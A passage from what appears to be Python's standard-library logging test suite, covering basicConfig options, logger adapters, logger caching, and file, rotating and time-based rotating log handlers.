r1 = logging.makeLogRecord({'msg': f'msg1_{key}'})
# https://bugs.python.org/issue45128
with support.swap_item(sys.modules, 'multiprocessing', None):
r2 = logging.makeLogRecord({'msg': f'msg2_{key}'})
results = {'processName' : name,
'r1.processName': r1.processName,
'r2.processName': r2.processName,
}
finally:
logging.logMultiprocessing = prev_logMultiprocessing
if conn:
conn.send(results)
else:
return results
def test_multiprocessing(self):
support.skip_if_broken_multiprocessing_synchronize()
multiprocessing_imported = 'multiprocessing' in sys.modules
try:
# logMultiprocessing is True by default
self.assertEqual(logging.logMultiprocessing, True)
LOG_MULTI_PROCESSING = True
# When logMultiprocessing == True:
# In the main process processName = 'MainProcess'
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
results = self._extract_logrecord_process_name(1, LOG_MULTI_PROCESSING)
self.assertEqual('MainProcess', results['processName'])
self.assertEqual('MainProcess', results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
            # In other processes, processName is correct when multiprocessing is imported,
# but it is (incorrectly) defaulted to 'MainProcess' otherwise (bpo-38762).
import multiprocessing
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(
target=self._extract_logrecord_process_name,
args=(2, LOG_MULTI_PROCESSING, child_conn,)
)
p.start()
results = parent_conn.recv()
self.assertNotEqual('MainProcess', results['processName'])
self.assertEqual(results['processName'], results['r1.processName'])
self.assertEqual('MainProcess', results['r2.processName'])
p.join()
finally:
if multiprocessing_imported:
import multiprocessing
def test_optional(self):
NONE = self.assertIsNone
NOT_NONE = self.assertIsNotNone
r = logging.makeLogRecord({})
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
NONE(r.taskName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
log_asyncio_tasks = logging.logAsyncioTasks
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
logging.logAsyncioTasks = False
r = logging.makeLogRecord({})
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
NONE(r.taskName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
logging.logAsyncioTasks = log_asyncio_tasks
async def _make_record_async(self, assertion):
r = logging.makeLogRecord({})
assertion(r.taskName)
@support.requires_working_socket()
def test_taskName_with_asyncio_imported(self):
try:
make_record = self._make_record_async
with asyncio.Runner() as runner:
logging.logAsyncioTasks = True
runner.run(make_record(self.assertIsNotNone))
logging.logAsyncioTasks = False
runner.run(make_record(self.assertIsNone))
finally:
asyncio.set_event_loop_policy(None)
@support.requires_working_socket()
def test_taskName_without_asyncio_imported(self):
try:
make_record = self._make_record_async
with asyncio.Runner() as runner, support.swap_item(sys.modules, 'asyncio', None):
logging.logAsyncioTasks = True
runner.run(make_record(self.assertIsNone))
logging.logAsyncioTasks = False
runner.run(make_record(self.assertIsNone))
finally:
asyncio.set_event_loop_policy(None)
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', encoding='utf-8')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a', encoding='utf-8')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
@support.requires_working_socket()
def test_log_taskName(self):
async def log_record():
logging.warning('hello world')
handler = None
log_filename = make_temp_file('.log', 'test-logging-taskname-')
self.addCleanup(os.remove, log_filename)
try:
encoding = 'utf-8'
logging.basicConfig(filename=log_filename, errors='strict',
encoding=encoding, level=logging.WARNING,
format='%(taskName)s - %(message)s')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
with asyncio.Runner(debug=True) as runner:
logging.logAsyncioTasks = True
runner.run(log_record())
with open(log_filename, encoding='utf-8') as f:
data = f.read().strip()
self.assertRegex(data, r'Task-\d+ - hello world')
finally:
asyncio.set_event_loop_policy(None)
if handler:
handler.close()
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest, AssertErrorMessage):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assert_error_message(
TypeError, 'Level not an integer or a valid string: None',
self.logger.setLevel, None)
self.assert_error_message(
TypeError, 'Level not an integer or a valid string: (0, 0)',
self.logger.setLevel, (0, 0))
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
trigger = self.logger.warning
def innermost():
trigger('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
root_logger = logging.getLogger()
root_logger.addHandler(self.recording)
trigger = logging.warning
outer()
self.assertEqual(records[-1].funcName, 'outer')
root_logger.removeHandler(self.recording)
trigger = self.logger.warning
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
self.fn = make_temp_file(".log", "test_logging-2-")
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, encoding='utf-8', delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
def test_emit_after_closing_in_write_mode(self):
# Issue #42378
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, encoding='utf-8', mode='w')
fh.setFormatter(logging.Formatter('%(message)s'))
fh.emit(self.next_rec()) # '1'
fh.close()
fh.emit(self.next_rec()) # '2'
with open(self.fn) as fp:
self.assertEqual(fp.read().strip(), '1')
class RotatingFileHandlerTest(BaseFileTest):
@unittest.skipIf(support.is_wasi, "WASI does not have /dev/null.")
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
# bpo-45401 - test with special file
# We set maxBytes to 1 so that rollover would normally happen, except
# for the check for regular files
rh = logging.handlers.RotatingFileHandler(
os.devnull, encoding="utf-8", maxBytes=1)
self.assertFalse(rh.shouldRollover(self.next_rec()))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8", maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn, encoding="utf-8")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.replace(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib()
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, encoding="utf-8", backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
@unittest.skipIf(support.is_wasi, "WASI does not have /dev/null.")
def test_should_not_rollover(self):
# See bpo-45401. Should only ever rollover regular files
fh = logging.handlers.TimedRotatingFileHandler(
os.devnull, 'S', encoding="utf-8", backupCount=1)
time.sleep(1.1) # a little over a second ...
r = logging.makeLogRecord({'msg': 'testing - device file'})
self.assertFalse(fh.shouldRollover(r))
fh.close()
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(
self.fn, 'S', encoding="utf-8", backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', encoding="utf-8", delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', encoding="utf-8", delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', encoding="utf-8", delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when='MIDNIGHT', interval=1, backupCount=0,
utc=True, atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when='W%d' % day, interval=1, backupCount=0,
utc=True, atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
